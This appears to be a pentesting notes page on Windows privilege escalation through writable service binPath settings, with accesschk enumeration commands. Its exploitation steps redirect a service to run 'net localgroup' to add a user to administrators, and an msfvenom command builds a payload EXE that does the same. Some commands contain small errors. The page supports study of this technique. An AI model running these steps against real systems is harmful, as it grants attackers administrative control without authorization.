Insecure Service Permissions(binPath)

Windows services often run with high privileges and can be misconfigured to allow local p rivilege escalation. If a user has permission to modify the binPath of a service, they may be able to execute arbitart code with SYSTEM privilege

Service Basics

sc create up-server binPath= "C:\Windows\System32\PING.exe"
sc qc up-server 
sc query up-server 
sc start up-server 
sc config up-server binPath= "C:\Windows\System32\PING.exe 8.8.8.8"
sc start up-server

Enumeration Techniques

  • Service security editor

  • PowerUp - Part of powersploit, used for service misconfiguration enumeration

  • Sysinternals accesschk.exe

accesschk.exe -uvwc <service_name>
accesschk.exe -uvwc up-server

Service Permission Enumeration with accesschk

Use accesschk.exe (from Sysinternals) to identify misconfigured services where low privileged users can start, stop or modify service configurations checks all services (*) to see what permissions the user DevNull has - especially wheather they can start, stop or change service configurations

accesschk.exe -uwcv DevNull *

Verifies what could administrator group has over all services. Usefull to confirm expected behaviour for high-privileged group

accesschk.exe -uwcv administrators *

Check what standard users group can do on all services. if users can modify services, this is a high-end misconfigurations

accesschk.exe -uwcv users *

Checks what access Everyone group has to all services. If Everyone has write/start permissions. it likely leads to privilege escalation

accesschk.exe -uwcv Everyone *

Displays detailed permissions (-qv) for the copyfile service. Use this to inspect a specific service's discreationary access control list (DACL)

accesschk.exe /acceptable -uwcqv copyfile

Manual sc based enumeration

sc query state= all | findstr "SERVICE_NAME:" >> C:\Users\Public\servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Users\Public\servicenames.txt) DO @echo %i >> C:\Users\Public\services.txt
FOR /F %i in (C:\Users\Public\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Users\Public\path.txt

Exploitation Steps

1. Update binPath to malicious command or executable

sc config <service_name> binPath= "net localgroup administrator DevNull /add"
sc start <service_name>

2. Point a service to a custom EXE

sc config <service_name> binPath= "C:\Users\Public\test.exe
sc start <service_name>

3. Optional: Stop or Restart the service if needed

sc stop <service_name>
sc start <service_name>

4. Payload generation

  • Create malicious EXE using msfvenom

msfvenom -p windows/exec CMD="net localgroup administrators u1 /add" -f exe > Registry.exe

  • Replace original executive in binPath

PreviousDynamic Link Library Hijacking (DLL Hijacking)NextInsecure File Permission - Service Executable Files Path

Last updated